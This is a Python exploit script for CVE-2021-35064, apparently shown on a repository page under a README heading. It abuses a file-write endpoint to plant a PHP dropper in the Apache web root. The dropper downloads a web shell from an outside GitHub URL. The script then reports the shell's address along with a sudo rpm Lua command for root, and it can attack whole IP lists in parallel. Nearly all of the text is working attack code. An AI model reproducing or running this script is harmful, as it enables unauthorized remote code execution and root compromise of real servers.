README.md
Rendering markdown...
import os
import base64
import requests
import argparse
import sys, urllib3
import concurrent.futures
from rich.console import Console
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
console = Console()
banner=("ICAgX19fX19fICAgICBfX19fX19fICAgICBfX19fICAgX19fIF9fX18gIF8gICAgICBfX19fX19f"
"X18gICBfX18gICBfXyAgIF8gIF8gICAKICAvIF9fX1wgXCAgIC8gLyBfX19ffCAgIHxfX18gXCAv"
"IF8gXF9fXyBcLyB8ICAgIHxfX18gLyBfX198IC8gXyBcIC8gL18gfCB8fCB8ICAKIHwgfCAgICBc"
"IFwgLyAvfCAgX3wgX19fX18gX18pIHwgfCB8IHxfXykgfCB8X19fX18gfF8gXF9fXyBcfCB8IHwg"
"fCAnXyBcfCB8fCB8XyAKIHwgfF9fXyAgXCBWIC8gfCB8X198X19fX18vIF9fL3wgfF98IC8gX18v"
"fCB8X19fX198X18pIHxfXykgfCB8X3wgfCAoXykgfF9fICAgX3wKICBcX19fX3wgIFxfLyAgfF9f"
"X19ffCAgIHxfX19fX3xcX19fL19fX19ffF98ICAgIHxfX19fL19fX18vIFxfX18vIFxfX18vICAg"
"fF98ICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
"ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKCQkgICAgICAgICBDb2RlZCBCeSBWYWxlbnRp"
"biBMb2JzdGVpbgo="
)
def exploit(host):
writeFile(host)
console.log(getResult(host))
def writeFile(host):
try:
headers = {
"Host": f"{host}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "text/html, */*",
"Accept-Language": "en-GB,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"Sec-Gpc": "1",
"Te": "trailers",
"Connection": "close"
}
# write php web shell into the Apache web directory
data = {
"radioBtnVal":'<?php $ch = curl_init("https://raw.githubusercontent.com/Chocapikk/Shells/main/pwny.php");$fp = fopen("pwny.php", "wb");curl_setopt($ch, CURLOPT_FILE, $fp);curl_setopt($ch, CURLOPT_HEADER, 0);curl_exec($ch);curl_close($ch);fclose($fp);?>',
"associateFileName": "/var/www/html/balgo.php"}
requests.post(f"https://{host}/ajaxPages/writeBrowseFilePathAjax.php", headers=headers, data=data, timeout=2, verify=False)
except (requests.exceptions.Timeout,requests.exceptions.ConnectionError,requests.exceptions.InvalidURL,requests.exceptions.SSLError):
console.log(f"[red][!] Request timed out [/red] http://{host}/")
def getResult(host):
# query the web shell, using rpm as sudo for root privileges
dropper_exec = requests.get(f"https://{host}/balgo.php", timeout=2,verify=False)
file = requests.get(f"https://{host}/pwny.php", timeout=2, verify=False)
#sudo rpm --eval '%{lua:os.execute(\"" + cmd + "\")}
pageText = file.text
if 'chocapik' in pageText:
result = f"[green][<>] Exploited | Shell : [bold]https://{host}/pwny.php[/bold][/green]\n"
result += "[green][<>] For root : sudo rpm --eval '%{lua:os.execute(\"<COMMAND>\")}'[/green]"
else:
result = f"[red][!] Fail [/red] http://{host}/"
return result
def main():
print("\n" + base64.b64decode(banner).decode("utf-8"))
parser = argparse.ArgumentParser(prog="CVE-2021-35064.py",
description="Example : python3 %(prog)s -i 127.0.0.1")
parser.add_argument("-i", help="IP address (not url)")
parser.add_argument("-f", help="IP file")
args = parser.parse_args()
if not args.f and not args.i:
parser.print_help()
sys.exit()
if args.i and not args.f:
exploit(args.i)
if args.f and not args.i:
with open(f"{os.getcwd()}/{args.f}",'r') as f:
ip_list = f.readlines()
with console.status("[bold green]Exploiting...", spinner='aesthetic') as status:
executor = concurrent.futures.ProcessPoolExecutor(20)
futures = [executor.submit(exploit, ip.strip().split('\n')[0]) for ip in ip_list]
concurrent.futures.wait(futures)
exit()
if __name__ == "__main__":
main()